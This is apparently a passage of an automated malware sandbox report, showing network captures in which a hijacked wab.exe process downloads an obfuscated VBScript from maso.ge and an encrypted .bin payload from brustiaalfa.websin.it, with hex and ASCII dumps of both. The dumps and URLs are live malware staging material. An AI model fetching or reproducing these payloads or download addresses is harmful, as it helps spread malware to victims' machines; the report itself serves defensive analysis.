30 58 32 44 71 64 39 78 32 48 58 48 58 79 36 67 31 6d 71 46 72 68 74 4f 44 6e 31 32 44
                                                        Data Ascii: oA97htp2Hvrmcl+m/zQP9Zgp0RwKcEUYW++iDg5drXk+3phhnMGD2IpupPvYvs/QGrq5exnpDE6A+gIkCJxA1uM9tWY+UjqgGTT9ExqXe2whzyd/m/oqnR2gBy94LLf1k7lv81iwCWMKqjqAvy7mPmh6X6FXezRTTZmDhNkHM3v6hY9TOx+HE/E05d9vyLwW/JyP4vh9F9g6nfcdh1x18uoNZqha4bfi+H0X2Dqd9x2HXHXy6g1mqFrhtODn12D
                                                        2024-03-18 07:07:42 UTC8000INData Raw: 45 42 79 37 70 33 57 77 7a 6a 67 57 71 4e 6b 4f 56 6b 72 46 76 79 56 59 54 34 62 56 58 69 79 53 74 6d 72 55 6c 68 66 33 68 34 62 47 48 51 59 79 33 54 65 55 31 77 51 51 35 34 61 6c 78 61 74 77 34 54 63 32 49 4c 2f 4e 64 4e 38 4e 46 37 47 46 6f 55 57 33 6c 6f 62 55 6e 51 31 50 66 57 4b 4b 47 74 79 69 55 2f 67 65 68 4e 73 74 77 47 35 46 52 77 69 49 36 6d 48 4d 68 34 38 6e 4b 6e 39 30 4c 6a 5a 32 46 37 49 72 2f 33 2f 75 68 63 52 4d 50 54 33 30 75 78 6a 72 4b 45 41 44 31 79 54 37 65 50 6b 37 54 37 77 74 62 32 47 55 37 2f 44 74 71 45 33 37 48 79 50 6b 75 72 54 48 75 50 6c 59 47 38 75 58 70 56 35 6c 34 76 55 63 6c 5a 57 59 72 6b 4d 59 68 45 74 58 4e 32 78 76 41 51 39 68 4a 6f 42 43 4e 44 4a 63 68 77 39 45 65 4f 45 69 46 68 5a 43 4c 79 45 70 68 33 33 36 55 78 34
                                                        Data Ascii: EBy7p3WwzjgWqNkOVkrFvyVYT4bVXiyStmrUlhf3h4bGHQYy3TeU1wQQ54alxatw4Tc2IL/NdN8NF7GFoUW3lobUnQ1PfWKKGtyiU/gehNstwG5FRwiI6mHMh48nKn90LjZ2F7Ir/3/uhcRMPT30uxjrKEAD1yT7ePk7T7wtb2GU7/DtqE37HyPkurTHuPlYG8uXpV5l4vUclZWYrkMYhEtXN2xvAQ9hJoBCNDJchw9EeOEiFhZCLyEph336Ux4
                                                        2024-03-18 07:07:42 UTC8000INData Raw: 5a 58 32 38 79 35 63 33 44 65 67 5a 4e 2b 52 30 6c 41 45 48 68 6e 53 6a 62 68 65 5a 4e 79 55 57 68 6c 76 48 68 74 55 6d 4c 64 35 65 66 6c 2b 6d 38 7a 52 6a 39 4f 55 6e 31 47 30 54 67 57 6d 4a 78 6e 51 34 58 61 75 51 74 58 51 55 46 70 5a 50 30 78 2b 33 56 57 71 38 43 57 65 50 50 44 45 50 59 48 63 4d 51 75 37 55 7a 6c 41 52 4e 64 68 42 72 59 67 74 67 55 45 4f 74 4f 56 76 4d 55 57 39 66 45 68 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 79 4d 6a 6d 73 53 41 37 67 30 77 74 68 69 71 52 76 54 57 4a 32 66 73 56 33 2b 50 56 56 34 71 4c 6e 38 2b 61 61 39 34 6e 42 45 61 39 42 56 68 76 6d 50 7a 50 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 46 2f 4d 43 32 42 66 7a 41 74 67 58 38 77 4c 59 4e 50 47 32 72
                                                        Data Ascii: ZX28y5c3DegZN+R0lAEHhnSjbheZNyUWhlvHhtUmLd5efl+m8zRj9OUn1G0TgWmJxnQ4XauQtXQUFpZP0x+3VWq8CWePPDEPYHcMQu7UzlARNdhBrYgtgUEOtOVvMUW9fEhtgX8wLYF/MC2BfzAtgX8wLYF/MC2BfzAtgyMjmsSA7g0wthiqRvTWJ2fsV3+PVV4qLn8+aa94nBEa9BVhvmPzPYF/MC2BfzAtgX8wLYF/MC2BfzAtgX8wLYNPG2r
                                                        2024-03-18 07:07:42 UTC8000INData Raw: 63 7a 67 74 67 78 4d 6a 49 66 6a 6c 4a 32 2b 48 71 7a 77 6c 67 58 38 74 66 78 54 46 4e 70 6d 4e 64 7a 41 73 59 50 4e 48 4d 35 4c 68 4e 64 68 43 4c 59 51 74 67 55 45 46 74 49 6c 76 4d 53 4a 2f 53 7a 77 6c 67 58 37 6e 68 49 35 6a 50 42 77 59 55 43 34 70 54 41 41 48 65 48 6d 63 63 69 6c 4f 6c 6f 47 50 52 33 76 2b 56 63 51 78 7a 57 4e 76 49 7a 41 74 67 33 6a 63 44 74 45 66 5a 42 4f 32 50 6a 41 39 67 42 45 33 49 63 58 50 46 43 2b 47 30 77 53 64 70 58 2f 58 42 42 74 34 7a 33 33 2b 59 7a 78 45 43 52 69 32 4b 6d 55 67 43 4f 6c 5a 6e 4d 59 70 6a 65 46 63 35 62 32 63 56 69 6c 50 6e 4c 44 4d 64 44 48 63 43 37 5a 6d 45 69 4a 74 64 77 34 66 78 48 38 67 4c 4f 39 37 6e 37 6b 43 33 45 4d 7a 6c 33 4d 30 4c 59 48 32 42 7a 44 48 62 46 6f 72 56 33 4d 30 4c 59 45 63 74 37 33
                                                        Data Ascii: czgtgxMjIfjlJ2+HqzwlgX8tfxTFNpmNdzAsYPNHM5LhNdhCLYQtgUEFtIlvMSJ/SzwlgX7nhI5jPBwYUC4pTAAHeHmccilOloGPR3v+VcQxzWNvIzAtg3jcDtEfZBO2PjA9gBE3IcXPFC+G0wSdpX/XBBt4z33+YzxECRi2KmUgCOlZnMYpjeFc5b2cVilPnLDMdDHcC7ZmEiJtdw4fxH8gLO97n7kC3EMzl3M0LYH2BzDHbForV3M0LYEct73


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        4192.168.2.549743195.54.178.44435548C:\Program Files (x86)\Windows Mail\wab.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:08:13 UTC181OUTGET /wp-admin/Klassespecifikke.vbs HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: maso.ge
                                                        Cache-Control: no-cache
                                                        2024-03-18 07:08:13 UTC212INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:08:13 GMT
                                                        Server: Apache
                                                        Last-Modified: Mon, 18 Mar 2024 01:23:38 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 266951
                                                        Connection: close
                                                        Content-Type: text/vbscript
                                                        2024-03-18 07:08:13 UTC7980INData Raw: 0d 0a 0d 0a 50 65 72 69 63 68 6f 6c 61 6e 67 69 74 69 73 64 6f 67 62 65 72 72 69 65 73 20 3d 20 54 69 6d 65 72 0d 0a 0d 0a 27 47 65 6e 74 69 6c 65 73 73 65 20 66 64 73 65 6c 73 68 6a 6c 70 65 72 65 6e 20 75 6e 67 72 65 61 74 0d 0a 27 43 65 6c 6c 65 74 79 70 65 73 20 67 65 6e 66 6f 72 68 61 6e 64 6c 65 64 65 20 6f 70 6b 6c 62 65 64 65 20 6e 65 64 73 69 76 6e 69 6e 67 73 62 65 6b 65 6e 64 74 67 72 65 6c 73 65 72 0d 0a 27 48 65 6d 6f 67 6c 6f 62 75 6c 69 6e 2c 20 61 6e 73 61 74 73 73 74 79 6b 6b 65 2c 20 69 6e 64 73 69 67 65 6c 73 65 72 73 2c 20 69 6e 76 6f 6c 75 74 65 20 74 76 65 74 79 64 69 67 68 65 64 65 72 6e 65 73 0d 0a 27 75 6e 73 63 72 75 74 69 6e 69 73 69 6e 67 6c 79 20 63 6f 6e 76 65 6e 65 72 34 38 20 63 62 61 62 62 61 67 65 20 72 61 6b 6b 65 72 69
                                                        Data Ascii: Pericholangitisdogberries = Timer'Gentilesse fdselshjlperen ungreat'Celletypes genforhandlede opklbede nedsivningsbekendtgrelser'Hemoglobulin, ansatsstykke, indsigelsers, involute tvetydighedernes'unscrutinisingly convener48 cbabbage rakkeri
                                                        2024-03-18 07:08:14 UTC8000INData Raw: 74 79 72 65 64 65 0d 0a 27 53 61 6d 6d 65 6e 74 6d 72 69 6e 67 73 20 65 72 65 63 74 65 64 0d 0a 27 41 73 63 6f 6d 79 63 65 74 65 73 20 70 75 62 6c 69 63 69 73 65 73 0d 0a 27 41 6e 74 73 68 72 69 6b 65 20 64 65 63 61 6e 61 6c 6c 79 20 6b 6f 6e 74 61 6b 74 70 61 72 61 6d 65 74 72 65 2e 20 73 65 72 69 65 6d 6f 72 64 65 72 20 69 6e 73 70 68 65 72 65 73 0d 0a 27 4c 65 67 65 6f 6e 6b 65 6c 65 6e 20 63 6f 6e 66 69 72 6d 61 74 6f 72 69 6c 79 20 64 61 65 64 61 6c 69 61 6e 2e 20 68 76 69 64 65 72 6e 65 32 32 37 20 70 72 65 66 61 74 6f 72 79 0d 0a 27 53 6d 69 74 68 69 6e 67 20 64 65 6c 76 69 73 74 3f 0d 0a 27 55 62 65 6d 72 6b 65 64 65 73 32 30 32 20 6b 61 6c 6b 75 6e 65 6e 73 20 76 61 72 69 61 62 69 6c 69 74 69 65 73 20 73 6f 75 72 63 65 66 69 6c 65 72 3f 20 63 6f
                                                        Data Ascii: tyrede'Sammentmrings erected'Ascomycetes publicises'Antshrike decanally kontaktparametre. seriemorder inspheres'Legeonkelen confirmatorily daedalian. hviderne227 prefatory'Smithing delvist?'Ubemrkedes202 kalkunens variabilities sourcefiler? co
                                                        2024-03-18 07:08:14 UTC8000INData Raw: 61 72 65 76 6f 6c 75 74 69 6f 6e 65 6e 73 32 32 36 3a 0d 0a 27 44 65 64 69 6b 61 74 69 6f 6e 35 34 20 61 70 68 65 74 69 73 6d 20 75 6e 6e 65 77 6e 65 73 73 0d 0a 27 53 79 6e 64 69 6b 65 72 65 6e 64 65 2c 20 68 65 74 68 73 21 20 67 61 2c 20 67 72 75 73 67 72 61 76 65 6e 65 20 74 65 61 74 65 72 73 61 6c 65 6e 0d 0a 27 45 6c 65 63 74 72 6f 63 61 74 61 6c 79 73 69 73 20 62 79 67 6e 69 6e 67 73 73 6e 65 64 6b 65 72 65 6e 73 2e 0d 0a 27 4f 62 64 75 63 65 6e 74 65 6e 20 66 6f 72 73 6b 6e 69 6e 67 73 73 65 6b 72 65 74 61 72 69 61 74 65 72 6e 65 73 20 72 69 73 69 6b 61 62 6c 65 72 65 20 6d 61 61 6c 74 69 64 65 72 20 64 6d 70 65 72 6e 65 0d 0a 27 48 65 6d 6c 69 6e 65 20 61 6c 64 65 69 61 31 30 36 2c 20 73 6e 75 72 72 69 67 73 74 65 73 0d 0a 27 43 6f 72 6e 63 6f 63
                                                        Data Ascii: arevolutionens226:'Dedikation54 aphetism unnewness'Syndikerende, heths! ga, grusgravene teatersalen'Electrocatalysis bygningssnedkerens.'Obducenten forskningssekretariaternes risikablere maaltider dmperne'Hemline aldeia106, snurrigstes'Corncoc
                                                        2024-03-18 07:08:14 UTC8000INData Raw: 6d 61 73 6b 69 6e 65 6e 73 22 0d 0a 43 6f 6e 73 74 20 47 6c 6f 72 69 66 69 63 61 74 69 6f 6e 73 20 3d 20 22 4d 67 6c 65 74 20 73 65 6d 69 73 65 72 69 6f 75 73 6c 79 22 0d 0a 43 6f 6e 73 74 20 46 6c 79 76 65 72 6e 65 20 3d 20 26 48 43 41 31 36 0d 0a 43 6f 6e 73 74 20 50 72 65 63 6c 69 6e 69 63 61 6c 20 3d 20 22 53 65 78 65 72 6e 2c 20 75 62 65 73 6b 72 65 76 6e 65 22 0d 0a 43 6f 6e 73 74 20 49 72 72 65 67 75 6c 72 74 20 3d 20 26 48 46 46 46 46 38 31 39 46 0d 0a 43 6f 6e 73 74 20 76 61 6c 75 74 61 68 61 6e 64 6c 65 72 6e 65 20 3d 20 22 53 63 72 61 79 65 20 67 72 64 65 6b 6f 6e 65 72 73 22 0d 0a 43 6f 6e 73 74 20 41 64 6f 70 74 61 6e 74 65 6e 73 36 31 20 3d 20 35 31 37 37 36 0d 0a 43 6f 6e 73 74 20 70 61 72 74 69 6c 69 6e 6a 65 6e 20 3d 20 22 4d 65 73 74 65
                                                        Data Ascii: maskinens"Const Glorifications = "Mglet semiseriously"Const Flyverne = &HCA16Const Preclinical = "Sexern, ubeskrevne"Const Irregulrt = &HFFFF819FConst valutahandlerne = "Scraye grdekoners"Const Adoptantens61 = 51776Const partilinjen = "Meste
                                                        2024-03-18 07:08:14 UTC8000INData Raw: 6f 6e 73 74 20 42 75 6b 73 65 6b 6e 61 70 70 65 72 73 20 3d 20 2d 31 32 36 37 39 0d 0a 43 6f 6e 73 74 20 53 6b 6a 74 65 72 20 3d 20 2d 31 32 32 38 39 0d 0a 43 6f 6e 73 74 20 45 74 63 68 65 64 20 3d 20 2d 33 30 39 32 35 0d 0a 43 6f 6e 73 74 20 66 61 6e 61 74 69 73 65 72 69 6e 67 65 72 6e 65 20 3d 20 36 30 39 37 35 0d 0a 43 6f 6e 73 74 20 54 69 6c 73 6b 69 6b 6b 65 6c 73 65 6e 73 20 3d 20 26 48 46 46 46 46 45 30 44 42 0d 0a 43 6f 6e 73 74 20 6d 69 64 6a 65 72 6e 65 20 3d 20 22 76 6b 6b 65 6c 73 65 73 70 72 64 69 6b 61 6e 74 65 6e 20 69 6e 74 65 72 6d 65 73 65 6e 74 65 72 69 61 6c 2c 20 61 74 74 72 69 62 75 74 69 76 65 73 22 0d 0a 43 6f 6e 73 74 20 70 6c 69 67 74 65 72 73 20 3d 20 22 4d 61 72 74 79 72 69 73 69 6e 67 31 35 39 20 75 64 73 6d 79 6b 6b 65 6e 64
                                                        Data Ascii: onst Bukseknappers = -12679Const Skjter = -12289Const Etched = -30925Const fanatiseringerne = 60975Const Tilskikkelsens = &HFFFFE0DBConst midjerne = "vkkelsesprdikanten intermesenterial, attributives"Const pligters = "Martyrising159 udsmykkend
                                                        2024-03-18 07:08:14 UTC8000INData Raw: 0a 43 6f 6e 73 74 20 53 6b 6a 6f 6c 64 62 72 75 73 6b 6b 69 72 74 6c 65 72 20 3d 20 22 4f 70 70 6f 72 74 75 6e 69 74 65 74 31 32 35 20 6e 6f 6e 67 65 6f 67 72 61 70 68 69 63 61 6c 6c 79 20 62 72 73 76 72 64 69 22 0d 0a 43 6f 6e 73 74 20 43 68 72 6f 6d 65 74 6f 70 68 6f 62 69 61 20 3d 20 26 48 34 46 39 31 0d 0a 43 6f 6e 73 74 20 49 6e 64 66 6c 79 64 65 6c 73 65 72 73 20 3d 20 26 48 46 46 46 46 35 35 44 37 0d 0a 43 6f 6e 73 74 20 42 65 73 76 69 67 65 6c 73 65 72 73 20 3d 20 33 32 30 37 38 0d 0a 43 6f 6e 73 74 20 53 6d 61 61 73 6b 6e 64 65 73 20 3d 20 2d 32 37 32 34 37 0d 0a 43 6f 6e 73 74 20 41 66 73 6b 72 6d 65 64 65 73 20 3d 20 36 31 32 39 34 0d 0a 43 6f 6e 73 74 20 49 6e 73 74 61 6e 74 69 61 74 69 6e 67 20 3d 20 22 6f 76 65 72 62 65 66 6f 6c 6b 65 64 65
                                                        Data Ascii: Const Skjoldbruskkirtler = "Opportunitet125 nongeographically brsvrdi"Const Chrometophobia = &H4F91Const Indflydelsers = &HFFFF55D7Const Besvigelsers = 32078Const Smaaskndes = -27247Const Afskrmedes = 61294Const Instantiating = "overbefolkede
                                                        2024-03-18 07:08:14 UTC8000INData Raw: 61 74 65 20 3d 20 26 48 46 46 46 46 43 36 34 33 0d 0a 43 6f 6e 73 74 20 54 68 72 69 66 74 79 20 3d 20 31 30 33 39 30 0d 0a 43 6f 6e 73 74 20 53 6b 72 69 76 65 6d 61 61 64 65 72 6e 65 73 20 3d 20 26 48 42 37 41 42 0d 0a 43 6f 6e 73 74 20 53 6a 6b 6c 20 3d 20 34 34 31 31 36 0d 0a 43 6f 6e 73 74 20 52 65 61 62 62 72 65 76 69 61 74 69 6e 67 20 3d 20 22 54 72 66 6f 64 65 72 65 74 73 20 74 69 6c 74 75 73 6b 6e 69 6e 67 65 72 73 20 6b 6f 6d 6d 65 6e 73 75 72 61 62 65 6c 74 22 0d 0a 43 6f 6e 73 74 20 62 75 64 67 65 74 74 65 72 69 6e 67 20 3d 20 2d 33 36 37 31 32 0d 0a 43 6f 6e 73 74 20 53 75 6c 61 69 6d 61 20 3d 20 22 52 61 6d 61 64 61 6e 65 6e 20 6e 6f 6e 72 65 70 65 6c 6c 65 72 20 73 65 6d 69 72 65 62 65 6c 6c 69 6f 75 73 6c 79 22 0d 0a 43 6f 6e 73 74 20 54 72
                                                        Data Ascii: ate = &HFFFFC643Const Thrifty = 10390Const Skrivemaadernes = &HB7ABConst Sjkl = 44116Const Reabbreviating = "Trfoderets tiltuskningers kommensurabelt"Const budgettering = -36712Const Sulaima = "Ramadanen nonrepeller semirebelliously"Const Tr
                                                        2024-03-18 07:08:14 UTC8000INData Raw: 0d 0a 43 6f 6e 73 74 20 57 65 64 6e 65 73 64 61 79 73 20 3d 20 33 30 32 33 32 0d 0a 43 6f 6e 73 74 20 44 69 73 63 6c 6f 75 74 20 3d 20 22 53 75 72 70 72 69 7a 65 64 20 74 65 6b 6e 6f 6c 6f 67 65 72 39 35 3a 20 68 61 6d 72 65 74 32 30 36 22 0d 0a 43 6f 6e 73 74 20 75 6d 69 73 6b 65 6e 64 65 6c 69 67 68 65 64 65 6e 20 3d 20 26 48 35 41 32 30 0d 0a 43 6f 6e 73 74 20 46 69 6c 74 72 65 72 69 6e 67 65 6e 20 3d 20 2d 34 34 37 38 33 0d 0a 43 6f 6e 73 74 20 50 6c 61 6e 6f 6d 69 6c 6c 65 72 20 3d 20 36 32 31 39 0d 0a 43 6f 6e 73 74 20 45 6e 74 65 6e 74 65 20 3d 20 22 41 75 67 6d 65 6e 74 65 72 6e 65 73 20 62 72 69 6c 6c 65 73 6c 61 6e 67 65 73 36 33 20 65 6e 6b 6e 6e 65 64 65 3f 20 73 65 6d 69 6d 65 73 73 69 61 6e 69 63 33 32 22 0d 0a 43 6f 6e 73 74 20 52 65 64 75
                                                        Data Ascii: Const Wednesdays = 30232Const Disclout = "Surprized teknologer95: hamret206"Const umiskendeligheden = &H5A20Const Filtreringen = -44783Const Planomiller = 6219Const Entente = "Augmenternes brilleslanges63 enknnede? semimessianic32"Const Redu
                                                        2024-03-18 07:08:14 UTC8000INData Raw: 53 74 69 62 62 6c 65 3b 20 74 72 61 77 6c 65 74 73 22 0d 0a 43 6f 6e 73 74 20 42 72 61 63 68 79 63 65 70 68 61 6c 69 7a 65 20 3d 20 26 48 44 30 45 39 0d 0a 43 6f 6e 73 74 20 43 6f 70 6c 61 6e 61 74 69 6f 6e 20 3d 20 26 48 46 46 46 46 39 32 32 42 0d 0a 43 6f 6e 73 74 20 4c 61 7a 61 72 65 74 74 65 72 73 20 3d 20 31 37 33 34 31 0d 0a 43 6f 6e 73 74 20 41 6b 65 6c 65 79 20 3d 20 26 48 46 46 46 46 43 36 38 35 0d 0a 43 6f 6e 73 74 20 47 75 72 74 73 20 3d 20 26 48 31 35 31 41 0d 0a 43 6f 6e 73 74 20 45 6d 79 64 73 31 39 20 3d 20 26 48 31 34 42 30 0d 0a 43 6f 6e 73 74 20 64 65 6e 6d 61 72 6b 20 3d 20 22 52 65 6d 61 69 6e 65 64 20 66 6c 61 74 68 65 20 67 67 6c 65 72 6e 65 73 22 0d 0a 43 6f 6e 73 74 20 43 61 62 62 61 6c 61 68 73 31 32 36 20 3d 20 33 36 38 39 0d 0a
                                                        Data Ascii: Stibble; trawlets"Const Brachycephalize = &HD0E9Const Coplanation = &HFFFF922BConst Lazaretters = 17341Const Akeley = &HFFFFC685Const Gurts = &H151AConst Emyds19 = &H14B0Const denmark = "Remained flathe gglernes"Const Cabbalahs126 = 3689
                                                        2024-03-18 07:08:14 UTC8000INData Raw: 43 6f 6e 73 74 20 4e 65 69 6b 61 20 3d 20 22 44 6f 75 62 6c 65 73 20 67 6c 64 65 6c 69 67 73 74 65 22 0d 0a 43 6f 6e 73 74 20 42 79 7a 61 6e 74 69 61 6e 20 3d 20 36 30 30 31 33 0d 0a 43 6f 6e 73 74 20 55 6f 70 6c 61 67 74 68 65 64 65 6e 20 3d 20 2d 34 32 31 31 33 0d 0a 43 6f 6e 73 74 20 4d 61 69 64 75 20 3d 20 22 49 6d 70 72 65 73 73 6f 72 20 70 75 64 65 6e 64 61 6c 20 73 6b 72 62 75 67 73 74 69 6c 66 6c 64 65 73 20 73 74 65 6e 74 65 73 31 34 31 21 22 0d 0a 43 6f 6e 73 74 20 50 65 70 70 65 72 74 72 65 65 20 3d 20 26 48 46 46 46 46 34 35 32 46 0d 0a 43 6f 6e 73 74 20 4d 61 72 6b 65 64 73 70 72 69 73 65 72 20 3d 20 2d 32 37 31 32 37 0d 0a 43 6f 6e 73 74 20 54 6f 74 65 6d 65 72 6e 65 20 3d 20 22 53 6f 6c 6f 70 61 72 74 69 65 72 6e 65 37 34 20 62 6f 61 74 73
                                                        Data Ascii: Const Neika = "Doubles gldeligste"Const Byzantian = 60013Const Uoplagtheden = -42113Const Maidu = "Impressor pudendal skrbugstilfldes stentes141!"Const Peppertree = &HFFFF452FConst Markedspriser = -27127Const Totemerne = "Solopartierne74 boats


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        5192.168.2.54974489.40.227.2484435548C:\Program Files (x86)\Windows Mail\wab.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-03-18 07:08:15 UTC195OUTGET /zwDhHUJEmBIkUtXcwKsarX186.bin HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: brustiaalfa.websin.it
                                                        Cache-Control: no-cache
                                                        2024-03-18 07:08:16 UTC249INHTTP/1.1 200 OK
                                                        Date: Mon, 18 Mar 2024 07:08:11 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Last-Modified: Mon, 18 Mar 2024 01:25:04 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 236096
                                                        Content-Type: application/octet-stream
                                                        2024-03-18 07:08:16 UTC7943INData Raw: 27 30 94 50 c9 00 0c c2 c7 f1 ba 8c fc 6b 5d 58 48 31 8a 0b 48 75 f9 09 3a 81 ff 77 09 c5 a7 c6 15 68 d3 fd 62 2d a9 9b da c3 bc ae d9 b0 c9 06 e6 c6 cd 1e 44 40 25 a8 43 15 df 4c b7 dd e9 9f 0a 3f 08 94 93 26 3f 4c 3a 2b 45 13 ac 70 6a 04 1a 8b 31 26 04 d7 b5 2a 50 9c 7d e4 d3 85 7a 8d a9 e5 8e 89 5d 8b e3 55 a4 de 87 8c c5 69 2d aa 64 b2 6b 8a 71 f0 19 3e c3 34 3e 7f 52 73 ab ad ab 79 5a 68 c0 eb 9b 93 3e 58 d6 44 ec a6 a4 8c 76 32 bb 98 80 dc c9 1b 2e 77 f2 ef 4f 96 d4 58 fd b3 14 d0 df 66 6e da 16 27 92 a4 8b e7 80 2d 43 c0 58 c8 43 c0 e2 45 e8 08 8e 4b 81 a1 49 ac 3f 37 cf 19 01 18 d2 40 a9 24 20 c2 ba 15 ed 3c 6a f9 68 de e1 e9 f2 c4 ae 98 16 44 9d 04 f7 34 df 92 ec 56 4b 84 25 c6 ad 38 54 7b 1b e3 66 dc b0 2a cd 55 77 d2 75 47 cf 14 d6 0f a0 bc 31
                                                        Data Ascii: '0Pk]XH1Hu:whb-D@%CL?&?L:+Epj1&*P}z]Ui-dkq>4>RsyZh>XDv2.wOXfn'-CXCEKI?7@$ <jhD4VK%8T{f*UwuG1
                                                        2024-03-18 07:08:16 UTC8000INData Raw: 05 07 b9 4b ea 9e 52 b3 79 dc 45 d0 83 3c 6c f1 9a 6b 8f c8 ec 87 1d b4 b7 e5 10 20 94 70 e9 77 e2 43 52 bd 3c 03 f7 b8 14 bc e9 c2 a0 62 e5 43 f5 01 1a 9a 45 7a 0d cf 70 be 86 df 6a 1c 0c 9a b5 87 74 89 4b 53 d5 70 9f 34 20 f0 45 b0 87 47 dd 48 c7 a4 f6 45 d7 13 f1 cb 9e 95 5e 15 61 e3 c3 1d 6c 8f a8 53 54 38 9b 6e 99 41 18 ec ef 31 1b 73 ea 6f 69 81 9b c5 f7 de df fd 35 18 39 61 7d c3 e9 7e 5e 68 e9 9d 8e 70 29 0c 9d 60 b6 47 9c 08 58 c7 38 ea d8 f7 26 5f 51 96 9f 83 f3 5c 27 ac b9 6c f3 ff f1 75 ac cf d6 ef fb dd 18 54 6d 3e 5a a5 5b ba b4 8d c9 a7 1d 72 ef cd c9 db 71 52 87 ad 30 b0 89 ce d7 4f 15 09 fe e9 f4 2c 87 80 b1 57 72 93 6e 99 51 5b 14 20 2b 0e b1 9e 7a ae f7 38 c1 12 ef 61 46 07 eb 43 b0 1c a8 b5 da 9c a3 0f 81 1d d5 61 8d 38 ce 51 26 fe 5e
                                                        Data Ascii: KRyE<lk pwCR<bCEzpjtKSp4 EGHE^alST8nA1soi59a}~^hp)`GX8&_Q\'luTm>Z[rqR0O,WrnQ[ +z8aFCa8Q&^
                                                        2024-03-18 07:08:16 UTC8000INData Raw: 3c 58 b1 86 d8 35 8e 5e 11 39 75 2b eb b5 41 b8 bc ff 61 b1 26 df 39 30 24 e6 b5 c8 21 bf 36 ba 88 ac 65 58 85 10 a9 a2 a9 b6 1c 65 b5 6a 71 01 ee bd c9 a1 1d 3e 3d 33 c7 ce 07 c4 7e 58 60 4b 8a 54 63 78 9e 0d ae d0 5b fd df 5b 49 b8 09 c9 d4 21 da 00 6a ab 86 6d ae e1 f6 c2 b6 97 89 4c cf 44 61 7f 1b 86 9b a2 5e fa 39 0f 39 c9 43 95 a7 8d b3 c3 c2 ba 86 bd e6 3d ec 0a d3 3c aa 38 1d 90 91 f7 30 25 cd 1e c7 5f 6d 3e 13 d1 62 4f ec b5 a2 c9 77 cc 35 fa 08 a9 eb 49 84 b9 fd b9 42 de f5 6e 36 a4 83 ea 7d f2 ef c8 f0 2e 4d cf 22 7a fa a0 76 a2 7a 60 a8 29 7c b1 8c 20 d8 42 7b 72 9d 53 3c e8 a5 a6 86 b3 bc c6 a7 bd c2 37 1c 8d 17 3e 26 37 a4 cd 5f fb 0c 06 5f a2 8b ec d5 ad 11 48 70 6e 15 6a 44 4c c3 97 54 e4 28 5d 81 9d e5 77 4f 18 10 c9 96 a3 03 52 76 2d fe
                                                        Data Ascii: <X5^9u+Aa&90$!6eXejq>=3~X`KTcx[[I!jmLDa^99C=<80%_m>bOw5IBn6}.M"zvz`)| B{rS<7>&7__HpnjDLT(]wORv-
                                                        2024-03-18 07:08:16 UTC8000INData Raw: ee ca 2a 0d e2 5c 30 c0 f6 bf c7 66 5a e6 dc 78 00 97 7a 64 04 0a 61 42 51 a5 4d d1 92 2f b6 a7 01 90 31 74 ad b9 c7 9d 5c d1 59 70 73 6a c6 9d 7a 00 ba 75 24 5a fc 0d 6f 4e fe 82 5e 47 75 0f 0d ab 1d e3 e8 7b f2 0e 00 8d 4d 70 e2 f7 73 df f3 1c 8f be 1f dd 45 19 1e 4b 59 d8 bd 84 2a bb 33 bd 3d e0 2a 17 4a 33 2c 20 33 9c cf 1f e1 9b bd c7 64 64 d2 6b 18 30 62 94 e1 ac 61 72 83 97 5b 03 3a 7f 37 00 0d 24 b7 11 08 1c a9 15 ca d7 b0 e1 5e 81 8c 43 42 6e 35 80 88 6a 9a e0 14 c2 db 1d b5 71 05 e6 38 72 bd 01 33 86 fe 6c dd 0a 1b a6 fb a8 27 03 b7 56 2b d6 76 5e ea aa ff db 7a 54 27 7f 72 69 81 79 6d fe e7 db 38 a2 63 79 96 25 81 2e cb af c1 06 54 18 f3 2e d4 cf e4 fd 09 87 b7 a1 45 4d 74 30 31 d4 d6 b8 18 ee 41 6b 66 be c3 d1 2b 20 9e 08 1b 78 d9 b8 5d 65 99
                                                        Data Ascii: *\0fZxzdaBQM/1t\Ypsjzu$ZoN^Gu{MpsEKY*3=*J3, 3ddk0bar[:7$^CBn5jq8r3l'V+v^zT'riym8cy%.T.EMt01Akf+ x]e
                                                        2024-03-18 07:08:16 UTC8000INData Raw: ad 89 17 0f fd 11 19 8d 19 d9 8e 02 68 6d 69 45 ec 2c 20 7d 65 72 97 d4 4d 5b 38 f5 23 56 53 f2 7b 0e 6c a1 bd a6 de 77 ee 0e cc f4 39 7e aa c9 f6 1b f5 fc 01 65 2b 4f 65 c8 86 78 d6 f7 67 23 e9 f4 87 84 49 20 a9 9d f0 a5 dc 2f ba 5b 0a 9d 6b 01 e2 5d 07 bd 58 3a 53 f7 50 23 0e d0 f8 bf 58 13 be e0 02 5a 6f 69 9e 0d 1e 9e 3a 20 71 01 fb 6c 16 f3 f3 60 c7 cc 7f 34 6c f6 74 a4 89 d5 54 94 ed 99 d7 a0 de 95 08 a2 12 2d e8 1e 0e c1 bc 3f bd 63 07 f2 98 ff 96 2c 1d 5f 87 63 2c 43 90 c4 10 62 c3 bf 15 ab 14 e0 c9 45 17 30 4f a8 fa 56 55 0d 94 c0 17 81 00 b7 c2 5f 23 e6 c1 69 20 1b 9b a7 a6 fb 85 a6 ae aa d8 26 2f 23 3b 35 7c 79 e4 b1 14 73 4c ef 9a e2 24 c3 62 03 01 5f e3 16 ff 1c 7a 69 89 f6 16 8b f4 69 bf a6 f5 f2 43 b8 4e e0 00 7d a9 de 3b b2 5f e5 4c c1 a2
                                                        Data Ascii: hmiE, }erM[8#VS{lw9~e+Oexg#I /[k]X:SP#XZoi: ql`4ltT-?c,_c,CbE0OVU_#i &/#;5|ysL$b_ziiCN};_L
